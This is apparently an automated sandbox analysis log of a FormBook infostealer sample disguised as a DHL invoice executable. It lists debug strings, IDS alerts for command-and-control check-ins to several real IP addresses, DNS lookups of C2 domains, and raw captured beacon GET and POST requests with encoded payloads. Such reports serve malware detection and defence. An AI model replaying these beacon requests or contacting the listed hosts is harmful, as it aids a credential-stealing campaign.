            Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Xml.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: wextract.pdbGCTL source: csc.exe, 00000004.00000002.2074916274.00000000052B8000.00000004.00000020.00020000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000C.00000002.4139831429.0000000000A08000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Xml.pdbp^ source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: wntdll.pdbUGP source: csc.exe, 00000004.00000003.1984836157.00000000053B5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000004.00000003.1986270313.0000000005569000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000004.00000002.2075036679.00000000058AE000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.2076822878.0000000004230000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.2078180097.00000000043E1000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Configuration.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Core.pdbH source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Xml.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8DF000.00000004.00000020.00020000.00000000.sdmp, dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C840000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.PDB" source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1846210334.000000F06B1F3000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Management.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Drawing.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Management.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Core.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbiX source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8DF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER21A5.tmp.dmp.7.dr
Source: C:\Windows\SysWOW64\wextract.exe | Code function: 13_2_0041C2A0 FindFirstFileW,FindNextFileW,FindClose | 13_2_0041C2A0
Source: C:\Windows\SysWOW64\wextract.exe | Code function: 4x nop then xor eax, eax | 13_2_00409B80
Source: C:\Windows\SysWOW64\wextract.exe | Code function: 4x nop then pop edi | 13_2_0040DE61
Source: C:\Windows\SysWOW64\wextract.exe | Code function: 4x nop then mov ebx, 00000004h | 13_2_048E04E8

            Networking

            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49838 -> 64.225.91.73:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49742 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49807 -> 64.225.91.73:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49792 -> 64.225.91.73:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49822 -> 64.225.91.73:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49869 -> 209.74.64.187:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49915 -> 209.74.64.187:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49900 -> 209.74.64.187:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49884 -> 209.74.64.187:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 98.124.224.17:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 67.223.117.169:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50001 -> 162.0.215.33:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49989 -> 162.0.215.33:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50040 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50036 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50053 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50020 -> 162.0.215.33:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50054 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50024 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 98.124.224.17:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50028 -> 98.124.224.17:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50051 -> 13.248.169.48:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50058 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50052 -> 13.248.169.48:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 162.0.215.33:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50048 -> 172.217.18.19:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 67.223.117.169:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 172.217.18.19:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 13.248.169.48:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50057 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 67.223.117.169:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50044 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50059 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50056 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50055 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 98.124.224.17:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 13.248.169.48:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50032 -> 67.223.117.169:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 172.217.18.19:80
            Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50047 -> 172.217.18.19:80
            Source: DNS query: www.booosted.xyz
            Source: Joe Sandbox View | IP Address: 64.225.91.73
            Source: Joe Sandbox View | IP Address: 209.74.64.187
            Source: Joe Sandbox View | ASN Name: ACPCA
            Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
            Source: Joe Sandbox View | ASN Name: MULTIBAND-NEWHOPEUS
            Source: Joe Sandbox View | ASN Name: AMAZON-02US
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /veiq/?gvyXe=EtxTw6OpYVppMB&Y8i=ZaCIZuFl7wZEptGr8oGQP+xb0A/J37Yq6QCg9bOCsWn91ieeFGXGB3UxVSoIIHFs/R2ofeQV0TveU8WhT6zXata70k2wUe2St57OOyVKg7CHUyAKXe1z7Nw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.arcare.partnersConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /zhgj/?Y8i=JdcPiMMO58hRVijVJpirz9/V5cix6+KSp2WZxXJhOFhYalpiiMnN1LFcUFae4/RxJfLAk2h1IoFKP2Vwx+6Zjf+Qzw/S6pq9Hcy8Rpyilffl6Uu+pL95yEg=&gvyXe=EtxTw6OpYVppMB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.bejho.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /ohf8/?gvyXe=EtxTw6OpYVppMB&Y8i=ll5dDbshsmxjCV2Jki1rRe0WTYojaPmnmIrEqeX5AC+cgPBA3oVXvxxUo0hOqHqzs3EuIGVBpbOb4OwgMNYqD9wq62ogBAVACXMNGlc+5YxBk1nmOhOQVvg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.jagdud.storeConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /0bvv/?gvyXe=EtxTw6OpYVppMB&Y8i=LsZlfLJLVWn36+29SrbHwZ4luzPZC8QC5ghK6sSKdTzC3J+tSarGA1FPkRmoEIfFSAMLZ+GzwFna9SDLC9K8A7K2msKq/CeIb1Pmlq+zJ/M9UWL1f9QpmJ4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.nieuws-july202541.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /d22y/?Y8i=dxLCwHEd799e6zKzvZNVLcz/EcQwMQKXxfRDzHSBACKu35rXWSMWvF6m2/zFPWSnOOS4JYjJIrjoqVx5R3nGQB+J6unEzU7Qg/zyG7VApaoWeyOXFK3Agjg=&gvyXe=EtxTw6OpYVppMB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.bandukchi.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /9kvp/?Y8i=irFuJh4j2fCN/xdLIJkju+0Ww/aOPRv0cSVSUNzcrQBJ8yd3G+0Gay8rhpLSBKnoinj5jjn5ajFjqPJaFJwFxtDWOxi5ujV2lXqfQRwRqrJQ238DxciUY6U=&gvyXe=EtxTw6OpYVppMB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.gcast.videoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /e61w/?Y8i=avqVMth+cNQRkZY2K2P4TQnPCfJBRHrYtZ8WRp4GnmfHlpA3lZroTpAoo3xn6sOeWVk5VUrnhZ7C94/2/OFxplk4lAdpGXqEZWiDVUw5kH/U8gSaCEqLMGU=&gvyXe=EtxTw6OpYVppMB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.rtpsilva4d.clickConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /37uf/?gvyXe=EtxTw6OpYVppMB&Y8i=ZqyRn0tKBl8eeDqDLfkB30WUCggn+8okKolBQQUOnigkga9xaBFfdezim29wA1t+01108B0pmPLbZAIUtL3722PCxl5Rmd8Hzuf5Mxa3n4hY0LoX5BPpi6c= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.bearableguy.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /kgqw/?Y8i=++51ydVD2Go1KxhaP3MVo0+h3G0aMK8VVopxxXyVivx076J57lFiLJq/o16RBKp5kNk8000HSHMzLW5tY9vsaI/mDiKsTd/UPoZk72+lh+5I9xFVF6w9VAA=&gvyXe=EtxTw6OpYVppMB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.funddata-x.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /5hlj/?gvyXe=EtxTw6OpYVppMB&Y8i=ZhDBEtFYcGNGcrgAAGaz4cmus4dxP105ym1b2z3b9xiYRPvGfE1I1cavQEWdGxySW1feFGHJVCpL7BE/D8kUvY9bRjJzxQ8BntPjPcySUs7sgICsU/uMV8Q= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.s9gzg9.vipConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /wlyv/?Y8i=IuREpM7aSitXKjuhE/mFHFDVwD2eRLCYNRFeU3oJFmzodDyLIPB9Z9kG2f5hKEjWCIf9aFQVH3NuQ6OQSrT4GxlP+w8Yb3pAn7KQBwnL39T0VCYIbwJiho8=&gvyXe=EtxTw6OpYVppMB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.oneid.inkConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /ikn1/?gvyXe=EtxTw6OpYVppMB&Y8i=lK8QPaLm/zhKqJMYNE2sX5D70ErSQQuPCqsI86u1e/xCs+G60RywLXCNnEZxAwXF4d4PTI/6YISBOu+SCh07N1ax9JYA7qzNxjbZ37nRHq3jIobn9Z81aSM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.extrem.techConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global trafficHTTP traffic detected: GET /8hrm/?Y8i=/8yNM9wGzpX2p7Gr9OMs8k3Lkit8nMI9nKTTJBalfkMfH6xzxaryHaqGqaSFmjBUY2ej3x2hRFvFhHVuCPrBPiINYkfJGOYYxyYlLdiiR95oU5gTTm7ij0A=&gvyXe=EtxTw6OpYVppMB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.everyone.golfConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
            Source: global traffic | DNS traffic detected: DNS query: www.arcare.partners
            Source: global traffic | DNS traffic detected: DNS query: www.bejho.net
            Source: global traffic | DNS traffic detected: DNS query: www.jagdud.store
            Source: global traffic | DNS traffic detected: DNS query: www.dagoovis.org
            Source: global traffic | DNS traffic detected: DNS query: www.nieuws-july202541.sbs
            Source: global traffic | DNS traffic detected: DNS query: www.bandukchi.com
            Source: global traffic | DNS traffic detected: DNS query: www.gcast.video
            Source: global traffic | DNS traffic detected: DNS query: www.rtpsilva4d.click
            Source: global traffic | DNS traffic detected: DNS query: www.bearableguy.net
            Source: global traffic | DNS traffic detected: DNS query: www.funddata-x.net
            Source: global traffic | DNS traffic detected: DNS query: www.s9gzg9.vip
            Source: global traffic | DNS traffic detected: DNS query: www.oneid.ink
            Source: global traffic | DNS traffic detected: DNS query: www.extrem.tech
            Source: global traffic | DNS traffic detected: DNS query: www.everyone.golf
            Source: global traffic | DNS traffic detected: DNS query: www.booosted.xyz
            Source: unknownHTTP traffic detected: POST /zhgj/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflate, brHost: www.bejho.netOrigin: http://www.bejho.netReferer: http://www.bejho.net/zhgj/Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeContent-Length: 200User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2Data Raw: 59 38 69 3d 45 66 30 76 68 35 77 73 31 65 4a 51 54 68 2f 36 42 71 32 5a 78 4f 54 36 39 2f 79 63 6c 75 57 2f 2b 32 43 49 6b 41 31 51 42 79 70 79 4d 67 42 55 34 39 69 2b 33 66 59 46 5a 52 61 33 39 49 46 75 51 4a 44 35 74 57 6c 56 41 5a 70 2b 49 48 41 6c 78 6f 76 37 32 38 36 43 32 43 53 42 76 36 58 31 45 65 76 6d 61 4f 79 6e 70 4d 50 39 71 33 47 69 2f 5a 56 72 38 55 76 74 38 67 51 48 31 61 6e 44 66 43 44 76 68 50 56 41 66 52 75 59 71 35 47 44 46 30 43 66 36 6a 78 6a 7a 31 2f 52 73 4e 41 72 39 42 59 50 6f 70 6b 65 6b 6f 51 53 67 79 35 64 59 4b 76 7a 75 48 6a 68 65 4b 32 2f 49 61 79 7a 65 67 3d 3d Data Ascii: Y8i=Ef0vh5ws1eJQTh/6Bq2ZxOT69/ycluW/+2CIkA1QBypyMgBU49i+3fYFZRa39IFuQJD5tWlVAZp+IHAlxov7286C2CSBv6X1EevmaOynpMP9q3Gi/ZVr8Uvt8gQH1anDfCDvhPVAfRuYq5GDF0Cf6jxjz1/RsNAr9BYPopkekoQSgy5dYKvzuHjheK2/Iayzeg==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 17 Nov 2024 07:36:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
